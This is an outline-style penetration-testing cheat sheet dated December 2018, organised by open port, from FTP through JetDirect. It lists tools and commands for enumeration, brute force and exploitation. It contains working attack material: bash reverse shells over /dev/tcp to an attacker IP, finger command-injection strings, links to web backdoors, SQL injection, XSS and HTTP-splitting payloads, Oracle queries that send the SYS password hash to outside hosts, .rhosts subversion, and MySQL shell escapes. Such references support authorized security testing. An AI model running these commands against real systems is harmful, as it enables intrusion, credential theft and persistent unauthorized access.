Dec 03, 2018, 04:00 PM
• FTP port 21 open
  ○ Fingerprint server
    § telnet ip_address 21 (banner grab)
    § Run command ftp ip_address
    § ftp@example.com
    § Check for anonymous access
      □ ftp ip_address   Username: anonymous OR anon   Password: any@email.com
  ○ Password guessing
    § Hydra brute force
    § medusa
    § Brutus
  ○ Examine configuration files
    § ftpusers
    § ftp.conf
    § proftpd.conf
  ○ MiTM
    § pasvagg.pl
• SSH port 22 open
  ○ Fingerprint server
    § telnet ip_address 22 (banner grab)
    § scanssh
      □ scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
  ○ Password guessing
    § ssh root@ip_address
    § guess-who
      □ ./b -l username -h ip_address -p 22 -2 < password_file_location
    § Hydra brute force
    § brutessh
    § Ruby SSH Bruteforcer
  ○ Examine configuration files
    § ssh_config
    § sshd_config
    § authorized_keys
    § ssh_known_hosts
    § .shosts
  ○ SSH client programs
    § tunnelier
    § winsshd
    § putty
    § winscp
• Telnet port 23 open
  ○ Fingerprint server
    § telnet ip_address
      □ Common banner list (OS / Banner)
        ® Solaris 8 / SunOS 5.8
        ® Solaris 2.6 / SunOS 5.6
        ® Solaris 2.4 or 2.5.1 / Unix(r) System V Release 4.0 (hostname)
        ® SunOS 4.1.x / SunOS Unix (hostname)
        ® FreeBSD / FreeBSD/i386 (hostname) (ttyp1)
        ® NetBSD / NetBSD/i386 (hostname) (ttyp1)
        ® OpenBSD / OpenBSD/i386 (hostname) (ttyp1)
        ® Red Hat 8.0 / Red Hat Linux release 8.0 (Psyche)
        ® Debian 3.0 / Debian GNU/Linux 3.0 / hostname
        ® SGI IRIX 6.x / IRIX (hostname)
        ® IBM AIX 4.1.x / AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.
        ® IBM AIX 4.2.x or 4.3.x / AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.
        ® Nokia IPSO / IPSO (hostname) (ttyp0)
        ® Cisco IOS / User Access Verification
        ® Livingston ComOS / ComOS - Livingston PortMaster
    § telnetfp
  ○ Password attack
    § Common passwords
    § Hydra brute force
    § Brutus
    § telnet -l "-froot" hostname (Solaris 10+)
  ○ Examine configuration files
    § /etc/inetd.conf
    § /etc/xinetd.d/telnet
    § /etc/xinetd.d/stelnet
• Sendmail port 25 open
  ○ Fingerprint server
    § telnet ip_address 25 (banner grab)
  ○ Mail server testing
    § Enumerate users
      □ VRFY username (verifies whether username exists - enumeration of accounts)
      □ EXPN username (verifies whether username is valid - enumeration of accounts)
    § Mail spoof test
      □ HELO anything / MAIL FROM: spoofed_address / RCPT TO: valid_mail_account / DATA / . / QUIT
    § Mail relay test
      □ HELO anything
        ® Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain>
        ® Unknown domain - mail from: <user@unknown_domain>
        ® Domain not present - mail from: <user@localhost>
        ® Domain not supplied - mail from: <user>
        ® Source address omission - mail from: <> rcpt to: <nobody@recipient_domain>
        ® Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>
        ® Use double quotes - mail from: <user@domain> rcpt to: <"user@recipent-domain">
        ® Use IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>
        ® Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>
        ® Disparate formatting 2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>
  ○ Examine configuration files
    § sendmail.cf
    § submit.cf
• DNS port 53 open
  ○ Fingerprint server/service
    § host
      □ host [-aCdlnrTwv] [-c class] [-N ndots] [-R number] [-t type] [-W wait] name [server]
        ® -v verbose format
        ® -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR.
        ® -a Same as -t ANY.
        ® -l Zone transfer (if allowed).
        ® -f Save to a specified filename.
    § nslookup
      □ nslookup [-option ...] [host-to-find | - [server]]
    § dig
      □ dig [@server] [-b address] [-c class] [-f filename] [-k filename] [-p port#] [-t type] [-x addr] [-y name:key] [-4] [-6] [name] [type] [class] [queryopt...]
    § whois
      □ -h Use the named host to resolve the query
      □ -a Use ARIN to resolve the query
      □ -r Use RIPE to resolve the query
      □ -p Use APNIC to resolve the query
      □ -Q Perform a quick lookup
  ○ DNS enumeration
    § BiLE Suite
      □ perl BiLE.pl [website] [project_name]
      □ perl BiLE-weigh.pl [website] [input file]
      □ perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
      □ perl vet-mx.pl [input file] [true domain file] [output file]
      □ perl exp-tld.pl [input file] [output file]
      □ perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
      □ perl qtrace.pl [ip_address_file] [output_file]
      □ perl jarf-rev [subnetblock] [nameserver]
    § txdns
      □ txdns -rt -t domain_name
      □ txdns -x 50 -bb domain_name
      □ txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c:\hostlist.txt
  ○ Examine configuration files
    § host.conf
    § resolv.conf
    § named.conf
• TFTP port 69 open
  ○ TFTP enumeration
    § tftp ip_address PUT local_file
    § tftp ip_address GET conf.txt (or other files)
    § Solarwinds TFTP server
    § tftp -i <IP> GET /etc/passwd (old Solaris)
  ○ TFTP brute-forcing
    § TFTP bruteforcer
    § Cisco-Torch
• Finger port 79 open
  ○ User enumeration
    § finger 'a b c d e f g h' @example.com
    § finger admin@example.com
    § finger user@example.com
    § finger 0@example.com
    § finger .@example.com
    § finger **@example.com
    § finger test@example.com
    § finger @example.com
  ○ Command execution
    § finger "|/bin/id@example.com"
    § finger "|/bin/ls -a /@example.com"
  ○ Finger bounce
    § finger user@host@victim
    § finger @internal@external
• Web ports 80, 8080 etc. open
  ○ Fingerprint server
    § telnet ip_address port
    § Firefox plugins
      □ All
        ® firecat
      □ Specific
        ® add n edit cookies
        ® asnumber
        ® header spy
        ® live http headers
        ® shazou
        ® web developer
  ○ Crawl website
    § lynx [options] startfile/URL   Options include: -traversal -crawl -dump -image_links -source
    § httprint
    § Metagoofil
      □ metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
  ○ Web directory enumeration
    § Nikto
      □ nikto [-h target] [options]
    § DirBuster
    § Wikto
    § Goolag Scanner
  ○ Vulnerability assessment
    § Manual tests
      □ Default passwords
      □ Install backdoors
        ® ASP
          ◊ http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt
        ® Assorted
          ◊ http://michaeldaw.org/projects/web-backdoor-compilation/
          ◊ http://open-labs.org/hacker_webkit02.tar.gz
        ® Perl
          ◊ http://home.arcor.de/mschierlm/test/pmsh.pl
          ◊ http://pentestmonkey.net/tools/perl-reverse-shell/
          ◊ http://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz
        ® PHP
          ◊ http://php.spb.ru/remview/
          ◊ http://pentestmonkey.net/tools/php-reverse-shell/
          ◊ http://pentestmonkey.net/tools/php-findsock-shell/
        ® Python
          ◊ http://matahari.sourceforge.net/
        ® TCL
          ◊ http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes
        ® Bash connect-back shell
          ◊ GnuCitizen
            } Attack box: nc -l -p Port -vvv
            } Victim: $ exec 5<>/dev/tcp/IP_Address/Port
              Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
          ◊ Neohapsis
            } Attack box: nc -l -p Port -vvv
            } Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin
              Victim: $ exec 1>&0 # Next we copy stdin to stdout
              Victim: $ exec 2>&0 # And finally stdin to stderr
              Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0
      □ Method testing
        ® nc IP_Address Port
          ◊ HEAD / HTTP/1.0
          ◊ OPTIONS / HTTP/1.0
          ◊ PROPFIND / HTTP/1.0
          ◊ TRACE / HTTP/1.1
          ◊ PUT http://Target_URL/FILE_NAME
          ◊ POST http://Target_URL/FILE_NAME HTTP/1.x
      □ Upload files
        ® curl
          ◊ curl -u <username:password> -T file_to_upload <Target_URL>
          ◊ curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>
        ® put.pl
          ◊ put.pl -h target -r /remote_file_name -f local_file_name
        ® webdav
          ◊ cadaver
      □ View page source
        ® Hidden values
        ® Developer remarks
        ® Extraneous code
        ® Passwords!
      □ Input validation checks
        ® NULL or null
          ◊ Possible error messages returned.
        ® ' , " , ; , <!
          ◊ Breaks an SQL string or query; used for SQL, XPath and XML injection tests.
        ® - , = , + , "
          ◊ Used to craft SQL injection queries.
        ® ` , & , ! , | , < , >
          ◊ Used to find command execution vulnerabilities.
        ® "><script>alert(1)</script>
          ◊ Basic cross-site scripting checks.
        ® %0d%0a
          ◊ Carriage Return (%0d) Line Feed (%0a)
            } HTTP splitting
              – language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesirable content here</html>
                · i.e. Content-Length: 0 / HTTP/1.1 200 OK / Content-Type: text/html / Content-Length: 47 / <html>blah</html>
            } Cache poisoning
              – language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesirable content here</html>
        ® %7f , %ff
          ◊ Byte-length overflows; maximum 7- and 8-bit values.
        ® -1, other
          ◊ Integer and underflow vulnerabilities.
        ® %n , %x , %s
          ◊ Testing for format string vulnerabilities.
        ® ../
          ◊ Directory traversal vulnerabilities.
        ® % , _ , *
          ◊ Wildcard characters can sometimes present DoS issues or information disclosure.
        ® Ax1024+
          ◊ Overflow vulnerabilities.
      □ Automated table and column iteration
        ® orderby.py
          ◊ ./orderby.py www.site.com/index.php?id=
        ® d3sqlfuzz.py
          ◊ ./d3sqlfuzz.py www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE--
    § Vulnerability scanners
      □ Acunetix
      □ Grendelscan
      □ NStealth
      □ Obiwan III
      □ w3af
    § Specific applications/server tools
      □ Domino
        ® dominoaudit
          ◊ dominoaudit.pl [options] -h <IP>
      □ Joomla
        ® cms_few
          ◊ ./cms.py <site-name>
        ® joomsq
          ◊ ./joomsq.py <IP>
        ® joomlascan
          ◊ ./joomlascan.py <site> <options>   [options i.e. -p/-proxy <host:port> : Add proxy support; -404 : Don't show 404 responses]
        ® joomscan
          ◊ ./joomscan.py -u "www.site.com/joomladir/" -o site.txt -p 127.0.0.1:80
        ® jscan
          ◊ jscan.pl -f hostname
          ◊ (shell.txt required)
      □ aspaudit.pl
        ® asp-audit.pl http://target/app/filename.aspx (options i.e. -bf)
      □ vBulletin
        ® vbscan.py
          ◊ vbscan.py <host> <port> -v
          ◊ vbscan.py -update
      □ ZyXEL
        ® zyxel-bf.sh
        ® snmpwalk
          ◊ snmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2
        ® snmpget
          ◊ snmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0
  ○ Proxy testing
    § Burpsuite
    § Crowbar
    § Interceptor
    § Paros
    § Requester Raw
    § Suru
    § WebScarab
  ○ Examine configuration files
    § Generic
      □ Examine httpd.conf / Windows config files
    § JBoss
      □ JMX Console http://<IP>:8080/jmx-console/
        ® War file
    § Joomla
      □ configuration.php
      □ diagnostics.php
      □ joomla.inc.php
      □ config.inc.php
    § Mambo
      □ configuration.php
      □ config.inc.php
    § WordPress
      □ setup-config.php
      □ wp-config.php
    § ZyXEL
      □ /WAN.html (contains PPPoE ISP password)
      □ /WLAN_General.html and /WLAN.html (contains WEP key)
      □ /rpDyDNS.html (contains DDNS credentials)
      □ /Firewall_DefPolicy.html (Firewall)
      □ /CF_Keyword.html (Content Filter)
      □ /RemMagWWW.html (Remote MGMT)
      □ /rpSysAdmin.html (System)
      □ /LAN_IP.html (LAN)
      □ /NAT_General.html (NAT)
      □ /ViewLog.html (Logs)
      □ /rpFWUpload.html (Tools)
      □ /DiagGeneral.html (Diagnostic)
      □ /RemMagSNMP.html (SNMP Passwords)
      □ /LAN_ClientList.html (Current DHCP Leases)
      □ Config backups
        ® /RestoreCfg.html
        ® /BackupCfg.html
        ® Note: the above config files are not human-readable, and the following tool is required to extract possible admin credentials and other important settings
          ◊ ZyXEL Config Reader
  ○ Examine web server logs
    § c:\winnt\system32\Logfiles\W3SVC1
      □ awk -F " " '{print $3,$11}' filename | sort | uniq
  ○ References
    § White papers
      □ Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
      □ Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
      □ Blind Security Testing - An Evolutionary Approach
      □ Command Injection in XML Signatures and Encryption
      □ Input Validation Cheat Sheet
      □ SQL Injection Cheat Sheet
    § Books
      □ Hacking Exposed Web 2.0
      □ Hacking Exposed Web Applications
      □ The Web Application Hacker's Handbook
  ○ Exploit frameworks
    § Brute-force tools
      □ Acunetix
    § Metasploit
    § w3af
• Portmapper port 111 open
  ○ rpcdump.py
    § rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
  ○ rpcinfo
    § rpcinfo [options] IP_Address
• NTP port 123 open
  ○ NTP enumeration
    § ntpdc -c monlist IP_ADDRESS
    § ntpdc -c sysinfo IP_ADDRESS
    § ntpq
      □ host
      □ hostname
      □ ntpversion
      □ readlist
      □ version
  ○ Examine configuration files
    § ntp.conf
• NetBIOS ports 135-139, 445 open
  ○ nmap 192.168.0.101 --script=msrpc-enum
  ○ msf > use exploit/windows/dcerpc/ms03_026_dcom
  ○ smbclient -L 192.168.1.102
    smbclient //192.168.1.106/tmp
    smbclient \\\\192.168.1.105\\ipc$ -U john
    smbclient //192.168.1.105/ipc$ -U john
  ○ NetBIOS enumeration
    § Enum
      □ enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
    § Null session
      □ net use \\192.168.1.1\ipc$ "" /u:""
        ® net view \\ip_address
        ® Dumpsec
    § Smbclient
      □ smbclient -L //server/share password options
    § Superscan
      □ Enumeration tab.
    § user2sid/sid2user
    § Winfo
  ○ NetBIOS brute force
    § Hydra
    § Brutus
    § Cain & Abel
    § getacct
    § NAT (NetBIOS Auditing Tool)
  ○ Examine configuration files
    § smb.conf
    § lmhosts
• SNMP port 161 open
  ○ Default community strings
    § public
    § private
    § cisco
      □ cable-docsis
      □ ILMI
  ○ MIB enumeration
    § Windows NT
      □ .1.3.6.1.2.1.1.5 Hostnames
      □ .1.3.6.1.4.1.77.1.4.2 Domain Name
      □ .1.3.6.1.4.1.77.1.2.25 Usernames
      □ .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
      □ .1.3.6.1.4.1.77.1.2.27 Share Information
    § Solarwinds MIB walk
    § Getif
    § snmpwalk
      □ snmpwalk -v <Version> -c <Community string> <IP>
    § Snscan
    § Applications
      □ ZyXEL
        ® snmpget -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2.6.0
        ® snmpwalk -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2
  ○ SNMP brute force
    § onesixtyone
      □ onesixtyone -c SNMP.wordlist <IP>
    § cat
      □ ./cat -h <IP> -w SNMP.wordlist
    § Solarwinds SNMP Brute Force
    § ADMsnmp
  ○ Examine SNMP configuration files
    § snmp.conf
    § snmpd.conf
    § snmp-config.xml
• LDAP port 389 open
  ○ LDAP enumeration
    § ldapminer
      □ ldapminer -h ip_address -p port (not required if default) -d
    § luma
      □ GUI-based tool
    § ldp
      □ GUI-based tool
    § openldap
      □ ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
      □ ldapadd [-c] [-S file] [-n] [-v] [-k] [-K] [-M[M]] [-d debuglevel] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-h ldaphost] [-p ldap-port] [-P 2|3] [-O security-properties] [-I] [-Q] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] [-f file]
      □ ldapdelete [-n] [-v] [-k] [-K] [-c] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-P 2|3] [-p ldapport] [-O security-properties] [-U authcid] [-R realm] [-x] [-I] [-Q] [-X authzid] [-Y mech] [-Z[Z]] [dn]
      □ ldapmodify [-a] [-c] [-S file] [-n] [-v] [-k] [-K] [-M[M]] [-d debuglevel] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-O security-properties] [-I] [-Q] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] [-f file]
      □ ldapmodrdn [-r] [-n] [-v] [-k] [-K] [-c] [-M[M]] [-d debuglevel] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-O security-properties] [-I] [-Q] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] [-f file] [dn rdn]
  ○ LDAP brute force
    § bf_ldap
      □ bf_ldap -s server -d domain_name -u|-U username|users_list_file -L|-l passwords_list|length_of_passwords_to_generate
        ® optional: -p port (default 389), -v (verbose mode), -P LDAP user path (default ,CN=Users,)
    § K0ldS
    § LDAP_Brute.pl
  ○ Examine configuration files
    § General
      □ containers.ldif
      □ ldap.cfg
      □ ldap.conf
      □ ldap.xml
      □ ldap-config.xml
      □ ldap-realm.xml
      □ slapd.conf
    § IBM SecureWay V3 server
      □ V3.sas.oc
    § Microsoft Active Directory server
      □ msadClassesAttrs.ldif
    § Netscape Directory Server 4
      □ nsslapd.sas_at.conf
      □ nsslapd.sas_oc.conf
    § OpenLDAP directory server
      □ slapd.sas_at.conf
      □ slapd.sas_oc.conf
    § Sun ONE Directory Server 5.1
      □ 75sas.ldif
• PPTP/L2TP/VPN port 500/1723 open
  ○ Enumeration
    § ike-scan
    § ike-probe
  ○ Brute force
    § ike-crack
  ○ Reference material
    § PSK cracking paper
    § SecurityFocus Infocus
    § Scanning a VPN Implementation
• Modbus port 502 open
  ○ modscan
• rlogin port 513 open
  ○ Rlogin enumeration
    § Find the files
      □ find / -name .rhosts
      □ locate .rhosts
    § Examine files
      □ cat .rhosts
    § Manual login
      □ rlogin hostname -l username
      □ rlogin <IP>
    § Subvert the files
      □ echo ++ > .rhosts
  ○ Rlogin brute force
    § Hydra
• rsh port 514 open
  ○ Rsh enumeration
    § rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
  ○ Rsh brute force
    § rsh-grind
    § Hydra
    § medusa
• SQL Server ports 1433, 1434 open
  ○ SQL enumeration
    § piggy
    § SQLPing
      □ sqlping ip_address/hostname
    § SQLPing2
    § SQLPing3
    § SQLpoke
    § SQL Recon
    § SQLver
  ○ SQL brute force
    § SQLPAT
      □ sqlbf -u hashes.txt -d dictionary.dic -r out.rep  (dictionary attack)
      □ sqlbf -u hashes.txt -c default.cm -r out.rep  (brute-force attack)
    § SQL Dict
    § SQLAT
    § Hydra
    § SQLlhf
    § ForceSQL
• Citrix port 1494 open
  ○ Citrix enumeration
    § Default domain
    § Published applications
      □ ./citrix-pa-scan {IP_address/file | - | random} [timeout]
      □ citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
  ○ Citrix brute force
    § bforce.js
    § connect.js
    § Citrix Brute-forcer
    § Reference material
      □ Hacking Citrix - the legitimate backdoor
      □ Hacking Citrix - the forceful way
• Oracle port 1521 open
  ○ Oracle enumeration
    § oracsec
    § Repscan
    § Sidguess
    § Scuba
    § DNS/HTTP enumeration
      □ SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL;
      □ SQL> select utl_http.request('http://gladius:5500/'||(SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')) from dual;
    § WinSID
    § Oracle default password list
    § TNSVer
      □ tnsver host [port]
    § TCP scan
    § Oracle TNSLSNR
      □ Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
    § TNSCmd
      □ perl tnscmd.pl -h ip_address
      □ perl tnscmd.pl version -h ip_address
      □ perl tnscmd.pl status -h ip_address
      □ perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
    § LSNrCheck
    § Oracle Security Check (needs credentials)
    § OAT
      □ sh opwg.sh -s ip_address
      □ opwg.bat -s ip_address
      □ sh oquery.sh -s ip_address -u username -p password -d SID   OR   c:\oquery -s ip_address -u username -p password -d SID
    § OScanner
      □ sh oscanner.sh -s ip_address
      □ oscanner.exe -s ip_address
      □ sh reportviewer.sh oscanner_saved_file.xml
      □ reportviewer.exe oscanner_saved_file.xml
    § NGS Squirrel for Oracle
    § Service Register
      □ Service-register.exe ip_address
    § PLSQL Scanner 2008
  ○ Oracle brute force
    § OAK
      □ ora-getsid hostname port sid_dictionary_list
      □ ora-auth-alter-session host port sid username password sql
      □ ora-brutesid host port start
      □ ora-pwdbrute host port sid username password-file
      □ ora-userenum host port sid userlistfile
      □ ora-ver -e (-f -l -a) host port
    § breakable (targets application server port)
      □ breakable.exe host url [port] [v]
        ® host: ip_address of the Oracle Portal Server
        ® url: PATH_INFO i.e. /pls/orasso
        ® port: TCP port the Oracle Portal Server is serving pages from
        ® v: verbose
    § SQLInjector (targets application server port)
      □ sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
      □ sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
    § Check password
    § orabf
      □ orabf [hash]:[username] [options]
    § thc-orakel
      □ Cracker
      □ Client
      □ Crypto
    § DBVisualisor
      □ SQL scripts from pentest.co.uk
      □ Manual SQL input of previously reported vulnerabilities
  ○ Oracle reference material
    § Understanding SQL Injection
    § SQL Injection walkthrough
    § SQL Injection by example
    § Advanced SQL Injection in Oracle databases
    § Blind SQL Injection
    § SQL cheat sheets
      □ http://ha.ckers.org/sqlinjection
        http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
        http://www.0x000000.com/?i=14
        http://pentestmonkey.net/
• NFS port 2049 open
  ○ NFS enumeration
    § showmount -e hostname/ip_address
    § mount -t nfs ip_address:/directory_found_exported /local_mount_point
  ○ NFS brute force
    § Interact with the NFS share and try to add/delete
    § Exploit and Confuse Unix
  ○ Examine configuration files
    § /etc/exports
    § /etc/lib/nfs/xtab
• Compaq/HP Insight Manager ports 2301, 2381 open
  ○ HP enumeration
    § Authentication method
      □ Host OS authentication
      □ Default authentication
        ® Default passwords
    § Wikto
    § Nstealth
  ○ HP brute force
    § Hydra
    § Acunetix
  ○ Examine configuration files
    § path.properties
    § mx.log
    § CLIClientConfig.cfg
    § database.props
    § pg_hba.conf
    § jboss-service.xml
    § .namazurc
• MySQL port 3306 open
  ○ Enumeration
    § nmap -A -n -p3306 <IP Address>
    § nmap -A -n -PN --script:ALL -p3306 <IP Address>
    § telnet IP_Address 3306
    § use test; select * from test;
    § To check for other DBs -- show databases
  ○ Administration
    § MySQL Network Scanner
    § MySQL GUI Tools
    § mysqlshow
    § mysqlbinlog
  ○ Manual checks
    § Default usernames and passwords
      □ username: root   password: (empty)
      □ testing
        ® mysql -h <Hostname> -u root
        ® mysql -h <Hostname> -u root@localhost
        ® mysql -h <Hostname>
        ® mysql -h <Hostname> -u ""@localhost
    § Configuration files
      □ Operating system
        ® Windows
          ◊ config.ini
          ◊ my.ini
            } windows\my.ini
            } winnt\my.ini
          ◊ <InstDir>/mysql/data/
        ® Unix
          ◊ my.cnf
            } /etc/my.cnf
            } /etc/mysql/my.cnf
            } /var/lib/mysql/my.cnf
            } ~/.my.cnf
      □ Command history
        ® ~/.mysql.history
      □ Log files
        ® connections.log
        ® update.log
        ® common.log
      □ To run many SQL commands at once -- mysql -u username -p < manycommands.sql
      □ MySQL data directory (location specified in my.cnf)
        ® Parent dir = data directory
        ® mysql
        ® test
        ® information_schema (key information in MySQL)
          ◊ Complete table list -- select table_schema,table_name from tables;
          ◊ Exact privileges -- select grantee, table_schema, privilege_type FROM schema_privileges;
          ◊ File privileges -- select user,file_priv from mysql.user where user='root';
          ◊ Version -- select version();
          ◊ Load a specific file -- SELECT LOAD_FILE('FILENAME');
      □ SSL check
        ® mysql> show variables like 'have_openssl';
          ◊ If no rows are returned at all, the build itself doesn't support SSL connections and probably needs to be recompiled. If it is reported as disabled, the service simply wasn't started with SSL, which is easily fixed.
    § Privilege escalation
      □ Current level of access
        ® mysql> select user();
        ® mysql> select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';
      □ Access passwords
        ® mysql> use mysql
        ® mysql> select user,password from user;
      □ Create a new user and grant privileges
        ® mysql> create user test identified by 'test';
        ® mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
      □ Break into a shell
        ® mysql> \! cat /etc/passwd
        ® mysql> \! bash
  ○ SQL injection
    § mysql-miner.pl
      □ mysql-miner.pl http://target/ expected_string database
    § http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
    § http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
  ○ References
    § Design weaknesses
      □ MySQL running as root
      □ Exposed publicly on the Internet
    § http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
    § http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0
• RDesktop port 3389 open
  ○ Rdesktop enumeration
    § Remote Desktop Connection
  ○ Rdesktop brute force
    § TSGrinder
      □ tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
    § Tscrack
• Sybase port 5000+ open
  ○ Sybase enumeration
    § sybase-version ip_address (from NGS)
  ○ Sybase vulnerability assessment
    § Use DBVisualiser
      □ Sybase security checksheet
        ® Copy output into an Excel spreadsheet
        ® Evaluate misconfigured parameters
      □ Manual SQL input of previously reported vulnerabilities
        ® Advanced SQL Injection in SQL Server
        ® More Advanced SQL Injection
    § NGS Squirrel for Sybase
• SIP port 5060 open
  ○ SIP enumeration
    § netcat
      □ nc IP_Address Port
    § sipflanker
      □ python sipflanker.py 192.168.1-254
    § Sipscan
    § smap
      □ smap IP_Address/Subnet_Mask
      □ smap -o IP_Address/Subnet_Mask
      □ smap -l IP_Address
  ○ SIP packet crafting etc.
    § sipsak
      □ Tracing paths: sipsak -T -s sip:username@domain
      □ Options request: sipsak -vv -s sip:username@domain
      □ Query registered bindings: sipsak -I -C empty -a password -s sip:username@domain
    § siprogue
  ○ SIP vulnerability scanning/brute force
    § tftp bruteforcer
      □ Default dictionary file
      □ ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
    § VoIPaudit
    § SiVuS
  ○ Examine configuration files
    § SIPDefault.cnf
    § asterisk.conf
    § sip.conf
    § phone.conf
    § sip_notify.conf
    § <Ethernet address>.cfg
    § 000000000000.cfg
    § phone1.cfg
    § sip.cfg etc. etc.
• VNC port 5900^ open
  ○ VNC enumeration
    § Scans
      □ 5900^ for direct access; 5800 for HTTP access.
  ○ VNC brute force
    § Password attacks
      □ Remote
        ® Password guess
          ◊ vncrack
        ® Password crack
          ◊ vncrack
          ◊ Packet capture
            } Phoss http://www.phenoelit.de/phoss
      □ Local
        ® Registry locations
          ◊ \HKEY_CURRENT_USER\Software\ORL\WinVNC3
          ◊ \HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3
        ® Decryption key
          ◊ 0x238210763578887
  ○ Examine configuration files
    § .vnc
    § /etc/vnc/config
    § $HOME/.vnc/config
    § /etc/sysconfig/vncservers
    § /etc/vnc.conf
• X11 port 6000^ open
  ○ X11 enumeration
    § List open windows
    § Authentication method
      □ Xauth
      □ Xhost
  ○ X11 exploitation
    § xwd
      □ xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm
    § Keystrokes
      □ Received
      □ Transmitted
    § Screenshots
    § xhost +
  ○ Examine configuration files
    § /etc/Xn.hosts
    § /usr/lib/X11/xdm
      □ Search through all files for the command "xhost +" or "/usr/bin/X11/xhost +"
    § /usr/lib/X11/xdm/xsession
    § /usr/lib/X11/xdm/xsession-remote
    § /usr/lib/X11/xdm/xsession.0
    § /usr/lib/X11/xdm/xdm-config
      □ DisplayManager*authorize:on
• Tor ports 9001, 9030 open
  ○ Tor node checker
    § Ip Pages
    § Kewlio.net
  ○ nmap NSE script
• JetDirect port 9100 open
  ○ hijetta